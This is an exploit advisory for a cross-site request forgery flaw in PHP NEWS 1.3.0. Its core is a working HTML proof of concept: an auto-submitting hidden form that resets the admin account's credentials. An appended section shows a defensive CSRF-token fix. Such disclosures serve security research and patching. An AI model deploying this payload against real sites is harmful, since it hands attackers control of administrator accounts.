*=========================================================================================================
# Exploit Title: PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)
# Author: Meryem AKDOĞAN
# Google Dork: -
# Date: 16/10/2016
# Type: webapps
# Platform : PHP
# Vendor Homepage: http://newsphp.sourceforge.net
# Software Link: https://sourceforge.net/projects/newsphp/
# Version: 1.3.0
*=========================================================================================================

DETAILS
========================================
PHP NEWS 1.3.0 is vulnerable to CSRF (no CSRF token is in place): if an admin user can be tricked into visiting a crafted page created by the attacker (via spear phishing/social engineering), a form is submitted to http://sitename/path/index.php that changes the admin password. Once exploited, the attacker can log in to the admin panel using the username and password posted in the form.

RISK
========================================
An attacker can change the admin password through this vulnerability.

TECHNICAL DETAILS & POC
========================================
<html>
<!-- CSRF PoC -->
<body>
<form action="http://site_name/phpnews/index.php?action=modifynewsposter3" method="POST">
<input type="hidden" name="id" value="7" />
<input type="hidden" name="newusername" value="meryem akdogan" />
<input type="hidden" name="username" value="meryem" />
<input type="hidden" name="password" value="meryem123." />
<input type="hidden" name="password2" value="meryem123." />
<input type="hidden" name="email" value="b@gmail.com" />
<input type="hidden" name="language" value="en_GB" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
========================================
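As an added, defender-side example that is not part of this advisory or of PHP NEWS's own source: the synchronizer-token check a maintainer would put in front of a state-changing handler such as action=modifynewsposter3, so that a cross-site form like the PoC above is rejected. The function names csrf_token/csrf_verify and the csrf_token form field are assumptions.

```php
<?php
// Added example (not PHP NEWS source): synchronizer-token CSRF protection for a
// state-changing handler such as index.php?action=modifynewsposter3.
// The function names and the csrf_token field are hypothetical.

// Defense in depth (PHP 7.3+): a SameSite=Lax session cookie is not sent on
// cross-site POSTs, so the forged form also arrives without the admin session.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Issue one unguessable token per session; embed it in every state-changing form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// A page on another origin cannot read the victim's session token, so a
// cross-site form posts without a valid one and is rejected here.
function csrf_verify(string $sent): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && hash_equals($expected, $sent);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_verify((string)($_POST['csrf_token'] ?? ''))) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
    // Only now handle id, newusername, username, password, password2,
    // email and language as the original handler does.
}
?>
<form action="index.php?action=modifynewsposter3" method="POST">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>" />
  <!-- the existing id/newusername/username/password/password2/email/language fields go here -->
  <input type="submit" value="Save" />
</form>
```

The token must be compared with hash_equals (constant time) and regenerated on login, so that a leaked or guessed value from an earlier session cannot be replayed.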